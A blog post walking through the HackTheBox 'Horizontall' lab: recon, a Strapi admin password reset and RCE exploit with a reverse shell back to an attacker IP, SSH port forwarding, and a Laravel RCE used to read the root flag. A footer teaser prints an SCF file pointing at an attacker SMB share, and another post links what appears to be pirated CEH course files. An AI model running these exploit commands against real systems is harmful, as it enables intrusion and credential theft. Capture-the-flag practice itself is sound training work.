HackTheBox — Horizontall Writeup

 

HackTheBox — Horizontall Writeup

Matthew

Sep 11·6 min read

The first step is connecting to HackTheBox’s VPN (Kali/Parrot VM > OpenVPN, or use the in-browser Pwnbox).

Proceed with an Nmap scan on the target machine

nmap -A -sV -p- -T4 10.10.11.105

The results show a web server that is open on port 80, so lets navigate to the web server to possibly exploit it!

However, when you navigate to the web server a hostname pops up and doesn’t redirect you to the page. Therefore, we add this domain name to our “/etc/hosts” folder to successfully get to this web page.

Now that you navigated to the web server, it finally loads but if you’ve noticed, all buttons are completely useless!

Lets try inspecting the web page!

Now try navigating to these links in the source code to see if we can obtain an link, possibly

Looking through this piece of javascript “http://horizontall.htb//js/chunk-vendors.0e02b89e.js”, we didn’t really obtain anything. But when we navigated to “http://horizontall.htb//js/app.c68eb462.js” we actually found a subdomain. By using shortcuts in the browser “ctrl+f”, we see that the subdomain called, “http://api-prod.horizontall.htb/”. Immediately add this to your “/etc/hosts” file.

Or you could’ve ran gobuster the bruteforce subdomains

gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100

Yeah! New website is found! We should crack open your directory fuzzing tool such as dirsearch, gobuster, ffuf, or dirbuster.

gobuster dir — wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://api-prod.horizontall.htb/

Navigate to the admin page since it looks the most interesting! As you can see, it redirects you to a login page

First thing I did was looking up default creds for “strapi”, sadly nothing popped up. I tried “admin:admin” and “admin:password”, nothing!!! Since this login page wasn’t vulnerable to default credentials, I searched “strapi exploit” and found a remote code execution exploit :)

Make sure you keep in my mind to remote code execution github. But right now we need to click on the “Set password exploitdb” link to login into this web page.

https://www.exploit-db.com/exploits/50237

Then you have to go and change the source code of the exploit to the correct URL. Change the code accordingly. The password, you can set as anything but just make sure it’s easy to remember.

Run this exploit and you will reset the user for “admin” on this website. Login into the webserver with the set password you’ve put in the code.

Once you login into the website we can now use the remote code execution we saw previously when we looked up “strapi exploit”. Even though there is a uploads directory, it is completely useless because it just downloads the file you uploaded. I recommend for you try it to see how it works and then move on to the exploitation. Now, download the remote code execution exploit!

git clone https://github.com/diego-tella/CVE-2019-19609-EXPLOIT

In the examples it says you need a JSON web token, oh no. Load up burp suite to intercept a request so we can obtain the JSON web token for this server. Having your proxy on intercept mode, go to page that you logged in on and click on “Files Upload” on the left hand side. You see an “authorization” back in the burp suite request, so copy and paste that.

Replace the long JSON web token with your token. Also, replace the listener host ip address to yours. Before you run this command start a netcat listener on the port you typed in the command for the exploit.

python exploit.py -d api-prod.horizontall.htb -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMxMzk1NjYyLCJleHAiOjE2MzM5ODc2NjJ9.yLMKHDRNxTTfI69aCb8i264D7zSKgQIIipNrgvTWBbw -l 10.10.14.4 -p 9999

Yay! we got a shell and now we need to stabilize it and obtain user.txt

python -c ‘import pty; pty.spawn(“/bin/bash”)’ — stabilizing your shell

Strolling around the machine, I found a “database.json” file which stored the mysql creds. Even though I didn’t obtain anything out of going to the mysql database you should play around with it just to get familiar with SQL commands.

mysql -u developer -p

To see what services are running on the network we can run the command “ss -lp” and we see that port 8000 is open which is interesting. If you try navigating to port 8000 it doesn’t work so it’s time for port forwarding.

ss -lp

Navigate to the “/opt/strapi” directory. Run the command “ssh-keygen”

ssh-keygen — This will create keys in “.ssh” since we’re doing ssh port fowarding. (go to .ssh)cat

create an “authorized_keys” file, touch authorized_keys

Get the public key of the machine and copy it. Paste it in the “authorized_keys” file. Now go to your attacker machine and navigate to “.ssh” to get your authorized_key. Copy that key and go back to the machine you have shell on and paste it in authorized_keys. So, you should have 2 sets of keys in authorized_keys on the “strapi” machine

It should look like something above if you “cat authorized_keys” on the target’s machine. Now we’re ready for ssh port fowarding!!! Essentially, we have to foward our port 8000 to the attacker’s port 8000 so we can navigate to our localhost and see the webpage!

ssh -L 8000:127.0.0.1:8000 strapi@horizontall.htb

As you can see we are not the root user here but if we navigate to “127.0.0.1:8000” on your local machine we get an web page that is using Laravel.

Lets try to find an exploit on Laravel by using searchsploit.

searchsploit laravel

searchsploit -p 49424 — now you see the directory so now, copy it to your own directory so we can use this exploit

python3 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log ‘id’

python3 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log ‘cat /root/root.txt’

Now we know this remote code execution works, so we can cat out the root file and obtain the final flag

We pwned it….

Comments

Post a Comment

Popular posts from this blog

🔰 CHE v10 🔰

*CEH v10 Download With PDF,Tools & Videos Files* Module 00: Introduction and Table of Contents http://www.mediafire.com/file/qzo9ptf01lvoawf/CEH+v10+Module+00+-++Introduction+and+table+of+Contents.pdf Module 01: Introduction to Ethical Hacking http://www.mediafire.com/file/n88nn8e0hytki26/CEH+v10+Module+01+Introduction+to+Ethical+Hacking.pdf Module 02: Footprinting and Reconnaissance http://www.mediafire.com/file/mg2ebx812nx0k2d/CEH+v10+Module+02+-+Footprinting+%26amp%3B+Reconnaissance.pdf Module 03: Scanning Networks http://www.mediafire.com/file/593t654bmvse8as/CEH+v10+Module+03+-+Scanning+Networks.pdf Module 04: Enumeration http://www.mediafire.com/file/rgzufa875ptj5h5/CEH+v10+Module+04+-+Enumeration.pdf Module 05: Vulnerability Analysis http://www.mediafire.com/file/q1ih2ge5f7e9f4q/CEH+v10+Module+05+Vulnerability+Analysis.pdf Module 06: System Hacking http://www.mediafire.com/file/xyh838vmn6k8r3k/CEH+v10+Module+06+System+Hacking.pdf Module 07: Malware Threats ht
Read more

Hackthebox — Driver Writeup

Image
  Hackthebox — Driver Writeup Matthew Oct 14 · 4 min read Proceed with an Nmap scan on the target machine nmap -A -sV -p- 10.10.11.106 Lets try accessing shares over smb. Anonymous login isn’t enabled on this machine. smbclient -L \\\\10.10.11.106\\ Now, enumerate the web server which brings up to a login prompt from “MFP Firmware Update Center”, so I tried to search up default credentials! I didn’t end up finding any default credentials for this login but, “ admin:admin ” worked. Now, navigating this website, I find an upload directory that is named “ fw_us.php ”. I tried uploading a shell  t o to the website, and modifying the request in Burp Suite to exploit a file upload vulnerability but nothing worked for me. After hours of finding a different methodology, I tried an  SCF(Shell Command Files)  file attack. [Shell] Command=2 IconFile=\\10.10.14.4\share\random.ico [Taskbar] Command=ToggleDesktop Labeling this file above  @test.scf  is important because it will put this to the top o
Read more